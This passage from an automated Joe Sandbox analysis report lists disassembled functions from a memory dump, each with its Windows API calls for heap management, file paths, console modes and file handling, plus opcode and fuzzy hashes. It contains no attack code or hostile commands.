                                                                            • Instruction Fuzzy Hash: B72131B1D00229AFEB10DFD8AC819EEBBFCFB48750F1441A6E505B3280DB758D009BA5
                                                                            Function 00B29FF8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2A034
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,00B0234C,0020005D), ref: 00B2A078
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2A0AA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,00B0234C,0020005D), ref: 00B2A0C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$DriveFullNamePathType
                                                                            • String ID:
                                                                            • API String ID: 3442494845-0
                                                                            • Opcode ID: c4062599b7c9fa84b735e184396343ba2329d58f2d448d29953cd01fe76f8962
                                                                            • Instruction ID: 7a411e32cfa246d293b2c6b6b4fe8d7ddac085f9dc52d929b2fce24f7275739a
                                                                            • Opcode Fuzzy Hash: c4062599b7c9fa84b735e184396343ba2329d58f2d448d29953cd01fe76f8962
                                                                            • Instruction Fuzzy Hash: 40217971A0011A9BDB24DFA5ED85DAFBBF9EF58304F0404EAE509D3241DA34DE44CB52
                                                                            Function 00B12960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcstol.MSVCRT ref: 00B12977
                                                                            • wcstol.MSVCRT ref: 00B12987
                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00B0E559,?,?,00000000,?), ref: 00B129FF
                                                                            • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00B0E559,?,?,00000000,?), ref: 00B12A09
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcstol$lstrcmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 4273384694-0
                                                                            • Opcode ID: fc11ad0955ff0421e0721487afb2a102b865b137f3ccc10b39972b211e7aaa36
                                                                            • Instruction ID: 464afd27dc1b0c65d9060db505cba8282655264c368a13d68da2c71f7eb498ff
                                                                            • Opcode Fuzzy Hash: fc11ad0955ff0421e0721487afb2a102b865b137f3ccc10b39972b211e7aaa36
                                                                            • Instruction Fuzzy Hash: CB11D632900526BB87215BBC89489FABAE8FF01394B9502B0E801D7650D765EEF0E6E4
                                                                            Function 00B2C535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2C56B
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00B2C5A5
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2C5BD
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 00B2C5DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$DriveNamePathTypeVolume
                                                                            • String ID:
                                                                            • API String ID: 1029679093-0
                                                                            • Opcode ID: df0484518dd46870964e9d238214c9913f26901c5af4b4561867e341fb4bb274
                                                                            • Instruction ID: 25b1920fd9b7b0561456eb01d47ae4507e77f0684af385988c3a97e4306410a5
                                                                            • Opcode Fuzzy Hash: df0484518dd46870964e9d238214c9913f26901c5af4b4561867e341fb4bb274
                                                                            • Instruction Fuzzy Hash: F1216331A002596BDB20DBA5EC86BAFBFF8FF54344F0404A9A509D3141EB74EB448B61
                                                                            Function 00B14C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aad4be4d7204413f67093399356134198a6fb2b2334c950a1da1fa3844f8e940
                                                                            • Instruction ID: c5ac24e81eb69e7410eb00eb3f9b8d77872fdca1a82b4f648370d2cfb5e9c27f
                                                                            • Opcode Fuzzy Hash: aad4be4d7204413f67093399356134198a6fb2b2334c950a1da1fa3844f8e940
                                                                            • Instruction Fuzzy Hash: 3C110435211614AFDB246B24AC9DFAE77A9EF86324F144299F806C71D1DF70DE018792
                                                                            Function 00B29809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B29822
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B292EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2982A
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B29841
                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B2986E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 2448200120-0
                                                                            • Opcode ID: a1114dab31d25dce7a04cb6d883a09091a0ebd22836f612b7807f2908ecb728b
                                                                            • Instruction ID: 973476387bac69f0f736a30fd9df5881cbc57f16d8bb4bb764570f6f8b7e72ca
                                                                            • Opcode Fuzzy Hash: a1114dab31d25dce7a04cb6d883a09091a0ebd22836f612b7807f2908ecb728b
                                                                            • Instruction Fuzzy Hash: 66110431200220AFDB159B21FC49A7F7799EB86B65F24416DF80DDB290DE708C008A61
                                                                            Function 00B07221 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00B29962,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B0727F
                                                                            • RtlFreeHeap.NTDLL ref: 00B07286
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00B072AF
                                                                            • RtlFreeHeap.NTDLL ref: 00B072B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            • Opcode ID: 60d83ab5761eb4a21df853a42f306bee627d72cb0613d251b0f1dde54461edd6
                                                                            • Instruction ID: f86429c21b96aec6a1a3c3a3cef1fb54f472ff2b5ae2b4c5be8d71a4560e5f2d
                                                                            • Opcode Fuzzy Hash: 60d83ab5761eb4a21df853a42f306bee627d72cb0613d251b0f1dde54461edd6
                                                                            • Instruction Fuzzy Hash: 8111E235A492409BDB20AF649845B3ABFE1EF87310F24448CF59ACB2D1CF34E842D761
                                                                            Function 00B062C8 Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00B06231,00000000,00000000,F330BDDA), ref: 00B0630C
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B06313
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocProcess
                                                                            • String ID:
                                                                            • API String ID: 1617791916-0
                                                                            • Opcode ID: 59bbc784d351ff3a2063a52a3945ebcb68d98e23fb98717ba8864d831c69120d
                                                                            • Instruction ID: 40129b59ece035726648d4daafbc946a6b30cbf54e0b10bbc32e10865ec68a96
                                                                            • Opcode Fuzzy Hash: 59bbc784d351ff3a2063a52a3945ebcb68d98e23fb98717ba8864d831c69120d
                                                                            • Instruction Fuzzy Hash: 45116B3670112197C6247B195814B3F6FD9FFC6B11F0900ECEA079B2D0CF21AE12A6DA
                                                                            Function 00B0DD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00B0BDB3,00000000,?), ref: 00B0DD37
                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B0DD3E
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B0DD53
                                                                            • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B0DD5A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocSize
                                                                            • String ID:
                                                                            • API String ID: 2549470565-0
                                                                            • Opcode ID: 445faaa9e5174ea915f954137f18543d47552286e151f5ea352908a9d3f12cc8
                                                                            • Instruction ID: 95b95438ad90465fdfcbbed4870839c1bc77f169074df6bfa909c7647cd45ae4
                                                                            • Opcode Fuzzy Hash: 445faaa9e5174ea915f954137f18543d47552286e151f5ea352908a9d3f12cc8
                                                                            • Instruction Fuzzy Hash: CD01B176240201ABD721ABA4EC88F9ABBE8FB81796F6041B5F509D70D0DB31DD44C7A0
                                                                            Function 00B28496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284B9
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284C6
                                                                            • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284EA
                                                                            • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00B08A51), ref: 00B284F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                            • String ID:
                                                                            • API String ID: 1033415088-0
                                                                            • Opcode ID: 2caa99b949499657130207566896d93587a48b5a8826ae61709cdf61f0d3b341
                                                                            • Instruction ID: 979cd97d6a86c03d6b384004050305896e326fcb37fad0c3ce28305783a80a48
                                                                            • Opcode Fuzzy Hash: 2caa99b949499657130207566896d93587a48b5a8826ae61709cdf61f0d3b341
                                                                            • Instruction Fuzzy Hash: 19014476A01129AF9B05AB749C959FFB7ECFF0E710B000169F516E3250EE249E06C765
                                                                            Function 00B15643 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B10060: wcschr.MSVCRT ref: 00B1006C
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00B15678
                                                                            • _open_osfhandle.MSVCRT ref: 00B1568C
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00B156A2
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B2122B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                            • String ID:
                                                                            • API String ID: 22757656-0
                                                                            • Opcode ID: 1c9012b433a04cb76752bf7e971354082a08de76817b76815d9bc370c5ff9931
                                                                            • Instruction ID: 0d91418f8224638de1a15994a94eaa3f08f7f2607280ca0f921132ec33de9b7f
                                                                            • Opcode Fuzzy Hash: 1c9012b433a04cb76752bf7e971354082a08de76817b76815d9bc370c5ff9931
                                                                            • Instruction Fuzzy Hash: 3F01A775900120FED7206BA8AC4DB9EBBE8E786734F604255F821E32E0DBB049458691
                                                                            Function 00B224F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00B222F8), ref: 00B22514
                                                                            • RtlFreeHeap.NTDLL ref: 00B2251B
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00B222F8), ref: 00B22539
                                                                            • RtlFreeHeap.NTDLL ref: 00B22540
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            • Opcode ID: ac8c076bdc288465cf1e3732de81144f03b4c84bede8ea93ce4791a61ac0118b
                                                                            • Instruction ID: de4af392bbf868dd065885410d4118b5b5c4da7090608b399331f82e61106349
                                                                            • Opcode Fuzzy Hash: ac8c076bdc288465cf1e3732de81144f03b4c84bede8ea93ce4791a61ac0118b
                                                                            • Instruction Fuzzy Hash: E7F06272650211AFE7149FA0EC88B65B7F8FF59312F10092DE145D7040DB74EAA5CBA1
                                                                            Function 00B08B96 Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00B0885E), ref: 00B08B9D
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0885E), ref: 00B08BA4
                                                                              • Part of subcall function 00B0A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00B0A9C5), ref: 00B0A9D8
                                                                              • Part of subcall function 00B0A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00B0A9F3
                                                                              • Part of subcall function 00B0A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00B0A9FA
                                                                              • Part of subcall function 00B0A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00B0AA09
                                                                              • Part of subcall function 00B0A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00B0AA12
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00B0885E), ref: 00B1B5B5
                                                                            • RtlFreeHeap.NTDLL ref: 00B1B5BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
                                                                            • String ID:
                                                                            • API String ID: 3480822025-0
                                                                            • Opcode ID: 9c4f43acbc435bb882911ae2235cccbe03802bbfbd06cc564e2fa29daed04dd8
                                                                            • Instruction ID: 6ccefe5de27bfb6c3b175ac38ed83dc4ad884aa4f7acc255e1dd6678727c6e6c
                                                                            • Opcode Fuzzy Hash: 9c4f43acbc435bb882911ae2235cccbe03802bbfbd06cc564e2fa29daed04dd8
                                                                            • Instruction Fuzzy Hash: 02E09A3268932167E6203BF47C1EB862E95EB46B62F050091F285EA1C0DE24C98087A2
                                                                            Function 00B16860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B16F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00B16F4F
                                                                            • __set_app_type.MSVCRT ref: 00B16872
                                                                            • __p__fmode.MSVCRT ref: 00B16888
                                                                            • __p__commode.MSVCRT ref: 00B16896
                                                                            • __setusermatherr.MSVCRT ref: 00B168B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                            • String ID:
                                                                            • API String ID: 1632413811-0
                                                                            • Opcode ID: d8b66163fc3fd4214182de219ee84007f0edf14ed0d66f82dce57ff0788db4c1
                                                                            • Instruction ID: 0b518dd8ff52bdba04f7502c6048f5266e2b2ff5480262936fc08c94dd10fc07
                                                                            • Opcode Fuzzy Hash: d8b66163fc3fd4214182de219ee84007f0edf14ed0d66f82dce57ff0788db4c1
                                                                            • Instruction Fuzzy Hash: 4FF0F8345543008FD7287F31FC0A5483BA1BB06321B500A99F471932F5EF39D182CB06
                                                                            Function 00B29F18 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B29F24
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00B2449C,?,?,00000001,?), ref: 00B29F2C
                                                                            • _get_osfhandle.MSVCRT ref: 00B29F42
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00B2449C,?,?,00000001,?), ref: 00B29F4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 1606018815-0
                                                                            • Opcode ID: 46bcf2ad5ece676788014980c835dd2631ed7b1db184de1a4537516701943669
                                                                            • Instruction ID: 15dabba5d6420fddc841bfe2259331d74edaab00e6d535e640a516bd28472370
                                                                            • Opcode Fuzzy Hash: 46bcf2ad5ece676788014980c835dd2631ed7b1db184de1a4537516701943669
                                                                            • Instruction Fuzzy Hash: E2E04F76540205FFEB009BB0ED0EBAE7B6CFB05364F100545F529D71D1DEB5EA009622
                                                                            Function 00B08235 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0824E
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B08256
                                                                            • _get_osfhandle.MSVCRT ref: 00B08264
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B0826C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 1606018815-0
                                                                            • Opcode ID: c7246065b22c2e49ff9e4f55fa044a515ac4d31f566bc484650ac9b4ab6bb2e9
                                                                            • Instruction ID: 4416c6b8d1bdc8f627afd7f4a9b86993596b72f8a78271b63e1c0cb99e80eaa5
                                                                            • Opcode Fuzzy Hash: c7246065b22c2e49ff9e4f55fa044a515ac4d31f566bc484650ac9b4ab6bb2e9
                                                                            • Instruction Fuzzy Hash: 28E026BA5442049FDB049FA4FD1EA693B64F719351B214419F205972B1DFB656009F12
                                                                            Function 00B072C6 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00B0729C), ref: 00B072CF
                                                                            • RtlFreeHeap.NTDLL ref: 00B072D6
